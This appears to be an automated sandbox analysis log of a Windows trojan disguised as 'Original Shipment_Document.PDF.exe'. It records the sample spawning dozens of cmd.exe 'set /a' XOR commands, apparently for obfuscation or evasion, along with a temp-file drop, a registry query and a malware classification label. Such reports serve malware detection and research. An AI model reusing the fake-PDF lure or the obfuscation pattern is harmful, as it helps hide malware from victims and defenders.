    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x41616575^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09696575^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x49796569^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19307571^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15793C65^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216D75^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15793C65^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09703C6B^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B6C7578^962155845"
    Source: C:\Windows\System32\Conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0363032C^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B2D2024^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x55183929^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x563A7D2C^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09753C65^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216475^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09696575^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15793C65^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5079653D^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0D697C35^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x172B6478^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03630620^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4D1F3C29^962155845"
    Source: C:\Windows\System32\Conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5C093A2C^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x572D3037^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x11307537^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0C75752C^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19686375^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09697569^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19307575^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15307575^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0A64721C^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03630720^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x583D132C^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x553C7D2C^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B6C7965^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x50792774^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15793C65^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216475^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09696575^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0975752C^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19697C2C^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x172B6678^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4C2A3037^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\Conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03631637^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5C382120^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7F303920^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x78713865^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B6D7569^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19307575^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x41616575^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09696575^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03631637^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x49796569^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19307571^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15793C65^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216D75^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15793C65^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09703C6B^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0363032C^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B2D2024^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x55183929^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x563A7D2C^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09753C65^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216475^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09696575^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15793C65^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09753C65^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216475^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5079653D^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0D697C35^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x172B6478^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03630620^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5C093A2C^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x572D3037^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x11307537^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0C75752C^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19686375^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09697569^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19307575^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15307575^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03630620^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0A64721C^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03630720^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x583D132C^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x553C7D2C^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B6C7965^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x50792774^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15793C65^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216475^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09696575^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0975752C^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19697C2C^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x172B6678^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4C2A3037^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeFile created: C:\Users\user\AppData\Local\Temp\nsf495B.tmpJump to behavior
    Source: classification engineClassification label: mal84.troj.evad.winEXE@185/6@0/0
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeFile read: C:\Users\desktop.iniJump to behavior
